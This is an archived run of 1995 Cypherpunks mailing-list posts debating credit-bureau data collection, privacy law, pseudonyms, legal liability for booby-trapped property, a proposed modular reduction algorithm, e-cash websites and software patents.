>was going to allow something similar?
>
>The risks? This is the perfect database if you want to red-line your offerings.
>I'm sure others will have more creative answers.

About the Lotus Marketplace product of several years ago, many of us thought at the time that the furor was misdirected, and the result ultimately damaging to privacy concerns. Why? Because the ZIP code data is _already_ available to the mass marketers, etc. The Marketplace product merely made it available to "the rest of us," allowing many people to have their eyes opened about what exists. By getting Lotus to pull the product, the public went back to sleep, lulled into the false sense of privacy that their ZIP codes were once again private.

Privacy needs to be protected by keeping some things secret, not by passing laws limiting the records others can collect from public or voluntarily offered information.

Don't get me wrong--I don't like TRW Credit, Equifax, TransUnion, or anyone else compiling "dossiers" on my spending habits, my travel itineraries, etc. But by using my VISA and MasterCard cards, and by agreeing to their terms and conditions, I am tacitly accepting that credit reporting agencies will have access to my transactions.

If there is a "market for privacy," and this is something we've talked about before, then someone will offer "The Privacy Card." We can debate what this card might offer, ranging from complete unlinkability (ecash protocols of various sorts) to non-reporting of records to the Big Three of credit reporting agencies. Even cards issued in the name of pseudonyms, of various sorts and backings.
Should there be laws _against_ this kind of Privacy Card, we should fight these laws. But we should not lull ourselves into a false sense of security by adopting the unconstitutional and anti-liberty approach of having "Fair Credit Reporting Act" and "Data Privacy Act" sorts of laws.

In my opinion, of course.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Wed Sep 6 16:16:27 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:16:27 PDT
Subject: Collection of personal info
Message-ID:

At 10:15 PM 9/6/95, Rob Lowry wrote:
>Beyond having the willies.. This is more than just scary, it feels like
>rape when you think about it for awhile. Everything you buy, on credit, is
>recorded and sold to someone who wants to know your secrets. Everytime
>you make a banking transaction, someone is watching and compiling the
>data.
>
>Is there any legal recourse to get your name removed from the sellable list?
>Or is it too late and we can not save even the vestiges of our privacy?

Rob, I have entered this posting of yours into the "BlackNet Dossier Service" I operate.

Sounds creepy and scary, eh? Well, it's part of freedom. The "legal recourse" you mention about having your name taken off lists kept by people or agencies ultimately involves visits by the authorities to private homes (like mine) to verify that the data are being "properly collected" and that no "illegal or incorrect data" are being stored.

If someone wants something kept secret, the solution is to keep it secret. If someone doesn't want their postings going into my 220 megabyte file of postings, they shouldn't send them to me. Or they should adopt a digital pseudonym, unlinkable to their True Name or any other nyms they may have.

Things are much simpler and less stressful when you don't look to the law to fix things.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From terrell at sam.neosoft.com Wed Sep 6 16:25:19 1995
From: terrell at sam.neosoft.com (Buford Terrell)
Date: Wed, 6 Sep 95 16:25:19 PDT
Subject: cryptography eliminates lawyers?
Message-ID: <199509062335.SAA02364@sam.neosoft.com>

>From: "Cortland D. Starrett"
>Subject: cryptography eliminates lawyers?
>As a follow-up to the article reference I posted, I pose the
>following question:
>
>Will cryptographic technology and information (communication)
>technology reduce the need for legal services in the future?
>(especially regarding contracts, buying/selling, patent law, etc.)
>Will legal services just look different? Will they be more
>efficient (cheaper)?
>
>Put bluntly, will cryptography put lawyers out of business?
>Any comments would be appreciated.
>
>Cort.
>

How could crypto put lawyers out of business? People would still have disagreements; plans would still go wrong; cars would still crash. More important, transactions would still need to be structured to carry out the desires of the parties while minimizing risks.

Good communications technology, including crypto, could make lawyering more efficient, but I suspect the savings would be minimal.
Communications technology will no more put lawyers out of business than CASE put programmers out of business.

Buford C. Terrell                 1303 San Jacinto Street
Professor of Law                  Houston, TX 77002
South Texas College of Law        voice (713)646-1857
terrell at sam.neosoft.com          fax (713)646-1766

From robl at on-ramp.ior.com Wed Sep 6 16:31:35 1995
From: robl at on-ramp.ior.com (Rob Lowry)
Date: Wed, 6 Sep 95 16:31:35 PDT
Subject: Flame: Re: Collection of personal info
In-Reply-To: <9509062238.AA06272@cs.umass.edu>
Message-ID:

> Some close friends of mine have been raped, and I get the overwhelming
> impression from them that rape has about as much in common with the sale of
> financial databases as it does with Rice-a-Roni. Find a better analogy, or
> you'll sound about as credible as those who insist the Internet teems with
> pedophilic bombers who push dope outside preschools.

Sorry if my choice of words offended you.. the intent was to express the feeling of being violated without consent. Perhaps I should have used the term violated or some other less violent term. The point being, I did not give permission for my records to be distributed, nor did I see a disclaimer on my credit cards that states that the transactions I make will be sold off to mailing houses in order to target me for additional sales.

RobL

From robl at on-ramp.ior.com Wed Sep 6 16:37:53 1995
From: robl at on-ramp.ior.com (Rob Lowry)
Date: Wed, 6 Sep 95 16:37:53 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

> Rob, I have entered this posting of yours into the "BlackNet Dossier
> Service" I operate.

At least you notified me.. :) Something the TRW crew or others like them do not do.

> If someone doesn't want their postings going into my 220 megabyte file of
> postings, they shouldn't send them to me. Or they should adopt a digital
> pseudonym, unlinkable to their True Name or any other nyms they may have.

This is true.. I could adopt a nym, such as I use on my BBS, or when I am doing other stuff on the net.. but it is difficult at best to get a new set of credit cards, ID and so on with a new name/alias and still maintain your own name. If it were possible to have an alias in real life, as easy as it is to get one on the 'net that is, then I would most certainly do so..

'Frothmonger'

From unicorn at polaris.mindport.net Wed Sep 6 16:52:17 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Wed, 6 Sep 95 16:52:17 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

On Wed, 6 Sep 1995, Rob Lowry wrote:

> > Rob, I have entered this posting of yours into the "BlackNet Dossier
> > Service" I operate.
>
> At least you notified me.. :) Something the TRW crew or others like them
> do not do.
>
>
> > If someone doesn't want their postings going into my 220 megabyte file of
> > postings, they shouldn't send them to me. Or they should adopt a digital
> > pseudonym, unlinkable to their True Name or any other nyms they may have.
>
> This is true.. I could adopt a nym, such as I use on my BBS, or when I am
> doing other stuff on the net.. but it is difficult at best to get a new
> set of credit cards, ID and so on with a new name/alias and still
> maintain your own name.

In fact it's not difficult. It's quite simple to establish a new identity for the individual willing to risk the charges and consequences of exposure. The basic impediment is time. Good credit doesn't come overnight. The second impediment is tax evasion, which is less than justifiable in the United States on the grounds of privacy. If you're willing to be patient, and pay taxes on more than one name, it's easy to maintain several identities.

> If it were possible to have an alias in real
> life, as easy as it is to get one on the 'net that is, then I would most
> certainly do so..

Which tells me how serious you really are about your privacy.
You have made a decision here about how much trouble privacy is worth to you, which is "not much."

I hear people bitch about privacy endlessly. Privacy helps those who help themselves to privacy. I think Mr. May was precisely correct in saying that it is so much easier and simpler for one to rely on self privacy insurance rather than government privacy insurance.

> 'Frothmonger'

From tcmay at got.net Wed Sep 6 16:57:45 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 16:57:45 PDT
Subject: Collection of personal info
Message-ID:

At 11:37 PM 9/6/95, Rob Lowry wrote:
>> Rob, I have entered this posting of yours into the "BlackNet Dossier
>> Service" I operate.
>
>At least you notified me.. :) Something the TRW crew or others like them
>do not do.

If you mean that TRW Credit does not inform you every time a transaction is entered into their files, this is true. Be grateful they don't.

If you mean the existence of the record itself has not been reported to you, it has hardly been a secret. It has been very well-known for many years that these records exist, and you can subscribe to a service that reports to you regularly about your credit record. (No, it is not "free," but why should it be? It costs them money to send this stuff to you, and they see it as a valid business market, as do I. At least the cost is fairly nominal.)

Again, you are free to use cash, to use a bank card which protects your privacy, and so forth.

...

>This is true.. I could adopt a nym, such as I use on my BBS, or when I am
>doing other stuff on the net.. but it is difficult at best to get a new
>set of credit cards, ID and so on with a new name/alias and still
>maintain your own name. If it were possible to have an alias in real
>life, as easy as it is to get one on the 'net that is, then I would most
>certainly do so..

I was not saying such nyms are easy to use in the real world (though friends of mine have VISA cards in fictitious names, and the cards are fully functional, and are not just "second names" on their main card). What I am saying is that we should be very careful not to lobby for laws which will make the surveillance state _more_ invasive, and more insinuated into every aspect of our lives.

Be concerned about the dossier society, just don't look to "the government" to protect you. Not only will they continue to keep their own dossiers (*), they'll use such "Data Privacy" laws to invade the privacy of others.

(* I've got a long section in my Cyphernomicon on the ties between the Big Three of credit reporting agencies, the FinCEN and similar folks, the intelligence agencies, and Witness Protection folks who give out those wonderful new identities. You think the Big Three don't know immediately who the 50,000+ people in Witness Protection (aka Witness Security) are? This may sound like something from the "Vince Foster and Danny Casolaro conspiracy tapes," but it has some direct links to Cypherpunks issues: the Feds have the power now to create new identities, falsify past financial records, and run the scams that these methods imply...and the Big Three are all headquartered within a few miles of the relevant agencies, in Vienna, Langley, McLean, Tyson's Corner, Herndon, Chantilly, Reston, and suchlike spook haunts in No. Virginia.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
From robl at on-ramp.ior.com Wed Sep 6 17:08:05 1995
From: robl at on-ramp.ior.com (Rob Lowry)
Date: Wed, 6 Sep 95 17:08:05 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

> Which tells me how serious you really are about your privacy. You have
> made a decision here about how much trouble privacy is worth to you,
> which is "not much."

If I were single, it would be a lot easier to just start making up names and living under assumed aliases.. but with a wife and two kids, I have to follow the rules a bit more.. My privacy is worth variable amounts depending on who has access to it.. I certainly do not care if anyone on this list knows who I am or not, as it is something I voluntarily chose to join. Selling info about me, without notifying me beforehand, is another situation altogether. Even the magazines I subscribe to have notices that my name may be sold.. and the mags that don't have such a warning, but sell my name anyway, get cancelled as soon as I discover it. Far easier to stop by the local PC store and buy it a week later than to have mounds of junk mail piling up.

> I hear people bitch about privacy endlessly. Privacy helps those who
> help themselves to privacy. I think Mr. May was precisely correct in saying
> that it is so much easier and simpler for one to rely on self privacy
> insurance rather than government privacy insurance.

Again, you both are correct, and perhaps I was overstating my position in regards to the TRW/etc. groups.. I have a tendency to do so. Each of us has the responsibility to monitor the activities in our lives, both directly and indirectly. Whether this is watching our spending to make sure we do not overcharge, or encrypting mail to keep it secure, we need to be aware of what we are doing, and the reactions of others as a result of our actions. In this case, the action is spending money on credit, and the reaction is being monitored by credit agencies. My solution was to get rid of all the credit cards 4 years ago.. my credit history is trashed in part due to very low activity over the last 4 years, and of course, the side effect of maxing out 4 cards.

-stepping off soapbox and looking for the next topic..-

From wilcoxb at nag.cs.colorado.edu Wed Sep 6 17:20:55 1995
From: wilcoxb at nag.cs.colorado.edu (Bryce Wilcox)
Date: Wed, 6 Sep 95 17:20:55 PDT
Subject: Are booby-trapped computers legal?
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID: <199509070020.SAA01751@nag.cs.colorado.edu>

-----BEGIN PGP SIGNED MESSAGE-----

> There is no self defense argument where the purpose is not to prevent
> physical harm.

If this were a political philosophy list I would state that self-defense justification often extends to property (As I believe it should). Since this is a cryptography-and-social-changes-thereof list I will refrain...

> People who go round drawing parallels to gun ownership and cryptography
> ownership are simply playing into the governments hands.

No! Stop! Don't say it! PLEASE go post this message to alt.security, talk.politics.guns and alt.fan.david-sternlight and keep it away from this list...

Bryce

(toss in alt.flame while you are at it...)

signatures follow:
+ public key on keyservers        /. island Life in a chaos sea
or via finger 0x617c6db9        / bryce.wilcox at colorado.edu ---*

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME46vvWZSllhfG25AQEX9QP9HpngGnwA1rSEo7knTJ8RalpK9HbZm0u/
SkO6blQCV8kqcYxN5uZTFefCQPjTakEaUv8YnWpHNGOfFIu8igNOGMTCTV6ptVEy
rYKqupcycYXugN7XGdgQH2UNCUO2M59FpBC65nm4FB05ZUrwYyz0weeCkmxDTZHP
1FKRnjXpWrU=
=b3yP
-----END PGP SIGNATURE-----

From weidai at eskimo.com Wed Sep 6 17:48:44 1995
From: weidai at eskimo.com (Wei Dai)
Date: Wed, 6 Sep 95 17:48:44 PDT
Subject: fast modular reduction
Message-ID:

During the Crypto' 95 Rump Session, Josh Benaloh of Microsoft Corp.
presented a new modular reduction algorithm that he and I developed. It is faster than the Montgomery method by about 10 to 15%, and is more general and easier to understand. The central idea is that it is easy to reduce a number to an equivalent one that's just one "block" (machine word) longer than the modulus, by repeatedly subtracting off the highest block, and adding back something that's equivalent, but smaller. In the following pseudocode, B is the radix in which the numbers are represented (2^32 for a 32-bit machine), n is the length of modulus in blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 is the length of X, and Y is the result. 1. Y = X 2. For i from k down to n+1, repeat steps 3 and 4 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1) 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1) Tricks can be used to eliminate step 4, and to reduce Y to n blocks using one single precision division, and n more single precision multiplications. The algorithm will hopefully be written up more completely soon. Wei Dai From mnorton at cavern.uark.edu Wed Sep 6 17:52:56 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 6 Sep 95 17:52:56 PDT Subject: Are booby-trapped computers legal? In-Reply-To: Message-ID: If the jury isn't persuaded betond reasonable doubt that you were in genuine apprehension of serious harm to yourself or your family--not your property--then you will be acquitted of using violence to repel an intruder into your home. Maybe not your south 40, but your home. Indeed, if the local prosecutor or US Atty believes, on the positive side, that your actions were reasonable, you probably won't even be charged. Now, that doesn't of itself make deadly force right, but as I'm just through with cleaning two shotguns (dove season here, going again Friday), I'm not going to argue the point too vigorously. I'd say the morality of such situations, leaving aside the legality, is extremely fact-intensive. Situational ethics? 
Excessive subjectivity? I think not--I think we can apply objective standards to each individual case, but it's fatuous to do so in advance.

MacN

On Tue, 5 Sep 1995, Timothy C. May wrote:

> >I don't know what you call it but if nothing else it is ethically and morally
> >reprehensible.
>
> Different strokes for different folks. Anyone entering my house unannounced
> faces lethal response. I think of it as evolution in action, and doubt I
> would lose any sleep over this.
>
> It has nothing to do with equating human life over property, it has to do
> with defending one's property and (maybe) one's life. Here in California,
> it is becoming more and more common for "home invasions" to be followed by
> execution of all of the witnesses. (Read "The San Jose Mercury News" for
> accounts of gang invasions in which all the residents in a home are lined
> up and shot, execution-style.)
>
> I won't get into a discussion of which states permit lethal force
> responses, as this is a topic which even I think belongs in
> talk.politics.guns or similar fora.
>
> Suffice it to say that most states allow lethal response under threatening
> circumstances.
>
> --Tim May
>
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA | knowledge, reputations, information markets,
> Higher Power: 2^756839 | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
>
>

From ravage at einstein.ssz.com Wed Sep 6 18:10:56 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Wed, 6 Sep 95 18:10:56 PDT
Subject: e$ sites of interest
Message-ID: <199509070116.UAA00143@einstein.ssz.com>

Hi all,

Found these in PC Week and thought I would pass them along...

CARI - http://www.
netresource.com/itp/cari.html
Collect All Relevant Information, a transaction system that doesn't require live transmission of sensitive data.

Cybercash Inc. - http://www.cybercash.com/
Secure transaction over the internet, using credit and cash payment systems.

Digicash - http://www.digicash.com/
Electronic transaction products include ecash; find the links to ecash-centric 'cybershops'.

First Virtual - http://www.fv.com/
Secure internet-based system that uses the WWW and email for digital payment transactions.

Internet Banking - http://sfnb.com/wpaper.html
White paper on electronic commerce

NetChex - http://www.netchex.com/index.html
Secure transactions over the internet, using a bank account debit system.

Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/ mepeirce/project.html
Overview of trends and techniques, with several useful links for additional information.

From mnorton at cavern.uark.edu Wed Sep 6 18:11:26 1995
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Wed, 6 Sep 95 18:11:26 PDT
Subject: Are booby-trapped... [Detailed treatment]
In-Reply-To:
Message-ID:

Thing about the Restatement (any of 'em) is that they must be read carefully, being especially wary of circularity. Note here that the actor would be privileged only to the extent he would be privileged, get it? under some other body of law not specifically referenced. So it all comes back to reasonable apprehension of bodily harm to yourself or your family (or guests, I suppose), in your home or similar place.

MacN

On Wed, 6 Sep 1995, Black Unicorn wrote:

>
> The basic rule today in most states resembles the restatement position:
>
> Section 85. Use of Mechanical Device Threatening Death or Serious
> Bodily Injury.
>
> The actor is so far privileged to use such a device intended or likely
> to cause serious bodily harm or death for the purpose of protecting his
> land or chattels from intrusion that he is not liable for the serious
> bodily harm or death thereby caused to an intruder whose intrusion is,
> in fact, such that the actor, were he present, would be privileged to
> prevent or terminate it by the intentional infliction of such harm.
>
> [big snip of excellent research]

From tcmay at got.net Wed Sep 6 18:18:52 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 18:18:52 PDT
Subject: Collection of personal info
Message-ID:

At 12:07 AM 9/7/95, Rob Lowry wrote:
>Again, you both are correct, and perhaps I was overstating my position in
>regards to the TRW/etc. groups.. I have a tendency to do so. Each of us
>has the responsibility to monitor the activities in our lives, both
...

You mentioned you're a newcomer to the list, so all is forgiven. Seriously, what you'll notice is that people (like me) will respond to arguments made, and, for obvious reasons, concentrate on the points of difference rather than the points of agreement.

So, keep posting!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From cman at communities.com Wed Sep 6 18:27:08 1995
From: cman at communities.com (Douglas Barnes)
Date: Wed, 6 Sep 95 18:27:08 PDT
Subject: fast modular reduction
Message-ID:

I was very distressed when Josh gave this presentation; apparently patents have been filed, etc., and someone from another company in Europe was claiming they'd _already_ patented it.

What is the story here?
From my pov, the performance increase doesn't justify the ramifications of dealing with yet another potentially surly patent holder (either Microsoft in your case, or whoever the irate European fellow was who claims to have already patented it.)

From kensington at earthlink.net Wed Sep 6 18:31:17 1995
From: kensington at earthlink.net (Steven Calabro)
Date: Wed, 6 Sep 95 18:31:17 PDT
Subject: Symbols on the net :)
Message-ID: <42ijlr$rff@mars.earthlink.net>

If you know of any symbols or acronyms used on the net, please mail them to me. Thanks

From mnorton at cavern.uark.edu Wed Sep 6 18:50:03 1995
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Wed, 6 Sep 95 18:50:03 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

Tim and I have corresponded about this previously, and again he neglects the distinction between collection and storage, on the one hand, and retrieval and dissemination, on the other. If you do the latter, your content better be accurate.

That's the difference in Tim and TRW. So far.:)

MacN

On Wed, 6 Sep 1995, Rob Lowry wrote:

> > Rob, I have entered this posting of yours into the "BlackNet Dossier
> > Service" I operate.
>
> At least you notified me.. :) Something the TRW crew or others like them
> do not do.
>
> > If someone doesn't want their postings going into my 220 megabyte file of
> > postings, they shouldn't send them to me. Or they should adopt a digital
> > pseudonym, unlinkable to their True Name or any other nyms they may have.
>
> This is true.. I could adopt a nym, such as I use on my BBS, or when I am
> doing other stuff on the net.. but it is difficult at best to get a new
> set of credit cards, ID and so on with a new name/alias and still
> maintain your own name. If it were possible to have an alias in real
> life, as easy as it is to get one on the 'net that is, then I would most
> certainly do so..
>
> 'Frothmonger'
>
>

From dsc at swcp.com Wed Sep 6 18:50:35 1995
From: dsc at swcp.com (Dar Scott)
Date: Wed, 6 Sep 95 18:50:35 PDT
Subject: e$ sites of interest
Message-ID:

Jim Choate wrote,
>Found these in PC Week and thought I would pass them along...

For me, new to this, I found NetBank's Netcash(tm) to be the most interesting even with its little built-in protection from those who spend money twice. NetBank's URL is this:

http://www.teleport.com/~netcash/

It is listed with many others in

>Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/
> mepeirce/project.html
>
> Overview of trends and techniques, with several useful links for
> additional information.

Dar (list newbie)

===========================================================
Dar Scott Home phone: +1 505 299 9497
Dar Scott Consulting Voice: +1 505 299 5790
8637 Horacio Place NE Email: darscott at aol.com
Albuquerque, NM 87111 dsc at swcp.com
Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From mfroomki at umiami.ir.miami.edu Wed Sep 6 18:56:28 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Wed, 6 Sep 95 18:56:28 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

As it happens I seem to be about to write about this stuff. Pointers to articles/data especially about distributed data sets and how people may link them up, would be very welcome...

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki at umiami.ir.miami.edu
U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid.
Coral Gables, FL 33124 USA | See (experimentally & erratically)
http://viper.law.miami.edu/~mfroomki

From rjc at clark.net Wed Sep 6 18:58:17 1995
From: rjc at clark.net (Ray Cromwell)
Date: Wed, 6 Sep 95 18:58:17 PDT
Subject: fast modular reduction
In-Reply-To:
Message-ID: <199509070157.VAA16973@clark.net>

>
> In the following pseudocode, B is the radix in which the numbers are
> represented (2^32 for a 32-bit machine), n is the length of modulus in
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1
> is the length of X, and Y is the result.
>
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)

Is there a proof of correctness available for this algorithm? It looks almost like a Radix-B peasant division algorithm with some modifications. Is there an algorithmic analysis available?

I also think there is a bug in your description. Let k+1 = n+1 (e.g. the dividend is 1 more "block" than the modulus). Then i=n starting out, and we have

3. Y=Y - Y[n] * B^n + Y[n] * U * B^(n-n-1) [we have B^-1]

I'm assuming this was unintended.

How does this algorithm compare to computing the reciprocal via Newton's Formula, and then multiplying by the reciprocal using Karatsuba multiplication? While I was at IBM Watson I invented a modular reduction algorithm that saves 1/4 the number of multiplications required on average once you have the reciprocal computed.

-Ray

From rjc at clark.net Wed Sep 6 19:05:44 1995
From: rjc at clark.net (Ray Cromwell)
Date: Wed, 6 Sep 95 19:05:44 PDT
Subject: fast modular reduction
In-Reply-To:
Message-ID: <199509070205.WAA18771@clark.net>

>
>
> I was very distressed when Josh gave this presentation; apparently
> patents have been filed, etc., and someone from another company
> in Europe was claiming they'd _already_ patented it.
>
> What is the story here?
> From my pov, the performance increase doesn't
> justify the ramifications of dealing with yet another potentially
> surly patent holder (either Microsoft in your case, or whoever the
> irate European fellow was who claims to have already patented it.)

I wish the damn patent offices of the world would get a clue. It used to be when someone found a quicker algorithm, it was published in a journal and sooner or later showed up in Knuth AoCP version x.y. Now, every single algorithm gets patented. At the rate it's going now, "ComponentWare" of the future will mean the number of patent components you managed to license simultaneously.

The worst patent being considered by the Patent Office right now is the dreaded Eolas patent which purports to have invented the concept of "embedded applications" in Web documents (e.g. Grail, Java, Safe-Tcl) and interprocess communication between web browsers and helper applications (e.g. NS-API/NC-API)

The whole patent system needs to be abolished.

-Ray

From tcmay at got.net Wed Sep 6 19:11:12 1995
From: tcmay at got.net (Timothy C. May)
Date: Wed, 6 Sep 95 19:11:12 PDT
Subject: Collection of personal info
Message-ID:

At 1:49 AM 9/7/95, Mac Norton wrote:
>Tim and I have corresponded about this previously,
>and again he neglects the distinction between
>collection and storage, on the one hand, and
>retrieval and dissemination, on the other. If you
>do the latter, your content better be accurate.
>
>That's the difference in Tim and TRW. So far.:)

I don't really disagree with Mac, at least practically speaking.

(At a much deeper level, much deeper in terms of philosophy, I'm not even sure _disseminators_ of information have any real necessity to be correct. This is the issue of truth, reputation, etc. that we discuss so often.
But, I admit that the legal system does not support my anarcho-capitalist extreme position, which is why I say I don't disagree with Mac, "practically speaking.")

However, even if I were to start distributing the results of "Tim's BlackNet Dossier Service," I don't think there's any justification for people insisting that they have a right to "inspect" my records.

I think the current U.S. law is not too far from my own views. The credit reporting agencies have an obvious interest in having accurate information--except for the folks in the Witness program--and will eventually correct errors. (Not everyone is happy with the speed, but this is life in a world of finite resources; and I acknowledge that there are pathological cases of incorrect identity, etc.)

I still favor free market alternatives to top-down government "protection."

And, lest anyone think I'm lapsing in my basic beliefs, I lean toward throwing out _all_ laws about libel, slander, and false information. After all, "what is truth?," to coin a phrase.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From mnorton at cavern.uark.edu Wed Sep 6 19:20:50 1995
From: mnorton at cavern.uark.edu (Mac Norton)
Date: Wed, 6 Sep 95 19:20:50 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID:

On Wed, 6 Sep 1995, Timothy C. May wrote:

> I don't really disagree with Mac, at least practically speaking.
>
> (At a much deeper level, much deeper in terms of philosophy, I'm not even
> sure _disseminators_ of information have any real necessity to be correct.
> This is the issue of truth, reputation, etc. that we discuss so often.
> But,
> I admit that the legal system does not support my anarcho-capitalist
> extreme position, which is why I say I don't disagree with Mac,
> "practically speaking.")

Well, scratch me deeply enough, I'm not sure I'd disagree with Tim, "philosophically speaking." The problem is, as all the truly wise philosophers recognized, we must live in the world. And given the number of us who must do so, that entails rules. With that caveat, none of the below is insufferable to me.

MacN

> However, even if I were to start distributing the results of "Tim's
> BlackNet Dossier Service," I don't think there's any justification for
> people insisting that they have a right to "inspect" my records.
>
> I think the current U.S. law is not too far from my own views. The credit
> reporting agencies have an obvious interest in having accurate
> information--except for the folks in the Witness program--and will
> eventually correct errors. (Not everyone is happy with the speed, but this
> is life in a world of finite resources; and I acknowledge that there are
> pathological cases of incorrect identity, etc.)
>
> I still favor free market alternatives to top-down government "protection."
>
> And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
> throwing out _all_ laws about libel, slander, and false information. After
> all, "what is truth?," to coin a phrase.
>
> --Tim May
>
>
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May | Crypto Anarchy: encryption, digital money,
> tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA | knowledge, reputations, information markets,
> Higher Power: 2^756839 | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
>
>
>

From ravage at einstein.ssz.com Wed Sep 6 19:21:55 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Wed, 6 Sep 95 19:21:55 PDT
Subject: Collection of personal info
In-Reply-To:
Message-ID: <199509070227.VAA00478@einstein.ssz.com>

>
> And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
> throwing out _all_ laws about libel, slander, and false information. After
> all, "what is truth?," to coin a phrase.
>
> --Tim May
>

Truth is that which can be verified to be reproducible by independent and unbiased parties. All else is opinion.

From jsimmons at goblin.punk.net Wed Sep 6 19:32:32 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Wed, 6 Sep 95 19:32:32 PDT
Subject: University logging mail to anon.penet
Message-ID: <199509070230.TAA24609@goblin.punk.net>

This just came up locally, and I'd like to have some comments on it, especially from people who understand the law a lot better than I do:

Our local University apparently has been logging ALL mail to anon.penet, including faculty, students, and off-campus users.

They maintain such weak security that someone was able to "obtain" the logs and post them to a local usenet group, thus compromising everyone's "anonymous" identities.

--
Jeff Simmons jsimmons at goblin.punk.net

From damion.furi at the-matrix.com Wed Sep 6 19:52:01 1995
From: damion.furi at the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 19:52:01 PDT
Subject: Collection of persona
In-Reply-To: <8B09393.000504D43B.uuout@the-matrix.com>
Message-ID: <8B094FC.000504D58B.uuout@the-matrix.com>

RL|Beyond having the willies.. This is more than just scary, it feels like
  |rape when you think about it for awhile. Everything you buy, on credit, is
  |recorded and sold to someone who wants to know your secrets. Every time
  |you make a banking transaction, someone is watching and compiling the
  |data.

It's not just credit anymore.
If you buy something at Radio Shack, even with cash, they want you to give all your info voluntarily and they _will_ give you flak if you don't cooperate (which can be short-circuited by threatening to cause a scene or by suggesting loudly that has lower prices). Anyway, most of what you're wanting to protect aren't secrets, at least in the sense of being sensitive material. It's our privacy, our solitude, and our peace of mind that's under attack.

RL|Is there any legal recourse to get your name removed from the sellable list?
  |Or is it too late and we can not save even the vestiges of our privacy?

There's a place in D.C. you can write to that will put a block on some lists, but not all (I don't have the address anymore). We're screwed.

RL|Oh, but if only I had the 'hacker' skill to break into such a database..
  |I have always been against the destruction of data.. but there are
  |exceptions...

It wouldn't help and you would be jailed for nothing.

:----------:----------:----------:----------:----------:----------:-----
: furi at the-matrix.com | pgp-public-key at demon.co.uk | LIVE LION ALERT
: 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0 F7 E9 67 1F AF B8 2D 94
PGP: When it's none of their damned business.
-- SPEED 1.40 [NR]: Evaluation day 133...

From gimonca at mirage.skypoint.com Wed Sep 6 20:01:08 1995
From: gimonca at mirage.skypoint.com (Charles Gimon)
Date: Wed, 6 Sep 95 20:01:08 PDT
Subject: University logging mail to anon.penet (fwd)
Message-ID:

Forwarded message:
> From toad.com!owner-cypherpunks Wed Sep 6 21:43:41 1995
> From: Jeff Simmons
